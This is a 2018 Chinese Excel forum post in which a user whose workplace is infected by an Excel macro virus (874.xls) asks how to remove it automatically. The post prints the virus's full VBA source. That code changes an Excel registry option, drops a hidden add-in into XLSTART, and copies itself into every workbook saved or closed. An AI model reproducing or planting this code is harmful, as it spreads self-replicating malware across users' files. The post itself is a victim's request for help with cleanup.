|
|
[广告] Excel易用宝 - 提升Excel的操作效率 · Excel / WPS表格插件 ★ 免费下载 ★ ★ 使用帮助★
本帖最后由 lrsh1985 于 2018-8-13 12:50 编辑
问题描述:
打开带毒的excel文件后,会自动给其他已经打开的excel文件的ThisWorkBook插入几段宏命令(如图,详细代码见下方蓝字所示)
同时,会在excel的启动文件夹(位置C:\Users\lirisheng\AppData\Roaming\Microsoft\Excel\XLSTART)里创建一个名为“874.xls”的文件
需求:
用什么方法能够杀毒,当打开带毒的文件(也就是ThisWorkBook包含下面这段蓝色字体代码的文件)的时候,能够自动清除下面这段代码并保存文件。
补充一下,我们单位很多人电脑里面的表格都感染了这个毒,所以每次当我自己手动处理完的时候,再打开别人的表格的时候还会出现
附1:
中毒文件举例
中毒文件举例.rar
(12.29 KB, 下载次数: 10)
附2:
产生病毒的代码
Option Explicit
Private Const cstrSection As String = "Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
Private Const cstrEngine As String = "874.XLS"
Private Const cstrModule As String = "ThisWorkbook"
Private Const cstrKeyName As String = "Options6"
Private Const cstrVolumeData As String = "IVID"
Private Declare PtrSafe Function GetVolumeInformation Lib "KERNEL32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As Long, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As Long, ByVal nFileSystemNameSize As Long) As Long
Private Declare PtrSafe Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Private Declare PtrSafe Function RegOpenKeyEx Lib "ADVAPI32.DLL" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare PtrSafe Function RegQueryValueEx Lib "ADVAPI32.DLL" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare PtrSafe Function RegSetValueEx Lib "ADVAPI32.DLL" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private WithEvents mapp As Application
Private Sub Workbook_Open()
Dim strEngine As String
Dim wbkEngine As Workbook
Dim cmdEngine As Object
Dim lngRegKey As Long
Dim lngRegType As Long
Dim lngRegValue As Long
Dim lngVolumeID As Long
On Error Resume Next
If (RegOpenKeyEx(&H80000001, cstrSection, 0, &H2001F, lngRegKey) = 0) Then
RegQueryValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue, 4
RegSetValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue And Not 8, 4
RegCloseKey lngRegKey
End If
strEngine = UCase$(Application.StartupPath + "\" + cstrEngine)
If UCase$(Me.FullName) = strEngine Then
Set mapp = Application
ElseIf Len(Dir(strEngine)) = 0 Then
Application.ScreenUpdating = False
If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath
Set wbkEngine = Workbooks.Add
wbkEngine.IsAddin = True
Intrude wbkEngine
GetVolumeInformation Left$(strEngine, InStr(1, strEngine, "\")), 0, 0, lngVolumeID, 0, 0, 0, 0
wbkEngine.CustomDocumentProperties.Add cstrVolumeData + Hex$(lngVolumeID), False, msoPropertyTypeString, ""
wbkEngine.SaveAs strEngine, xlAddIn
wbkEngine.Close
If (lngRegValue And 8) = 8 Then
Set cmdEngine = Me.VBProject.VBComponents(cstrModule).CodeModule
cmdEngine.DeleteLines 1, cmdEngine.CountOfLines
Me.Save
End If
Application.ScreenUpdating = True
Else
CopyVolumesData Workbooks(cstrEngine)
End If
End Sub
Private Sub mapp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
On Error Resume Next
Intrude Wb
End Sub
Private Sub mapp_WorkbookBeforeClose(ByVal Wb As Excel.Workbook, Cancel As Boolean)
On Error Resume Next
If Len(Wb.Path) <> 0 Then If Intrude(Wb) Then Wb.Save
End Sub
Private Function Intrude(wbkTarget As Workbook) As Boolean
Dim cmdSource As Object
Dim cmdTarget As Object
On Error Resume Next
Intrude = False
Set cmdSource = Me.VBProject.VBComponents(cstrModule).CodeModule
Set cmdTarget = wbkTarget.VBProject.VBComponents(cstrModule).CodeModule
If cmdTarget.CountOfLines <= 2 Then
cmdTarget.DeleteLines 1, cmdSource.CountOfLines
cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)
CopyVolumesData wbkTarget
Intrude = True
End If
End Function
Private Sub CopyVolumesData(wbkTarget As Workbook)
Dim pptVolume As DocumentProperty
On Error Resume Next
For Each pptVolume In Me.CustomDocumentProperties
If Left$(pptVolume.Name, Len(cstrVolumeData)) = cstrVolumeData Then
wbkTarget.CustomDocumentProperties.Add pptVolume.Name, False, pptVolume.Type, ""
wbkTarget.CustomDocumentProperties(pptVolume.Name).Value = pptVolume.Value
End If
Next
End Sub
|
|
沪公网安备 31011702000001号 沪ICP备11019229号-2
发表于 2018-8-13 12:48
楼主
发表于 2021-9-24 17:48
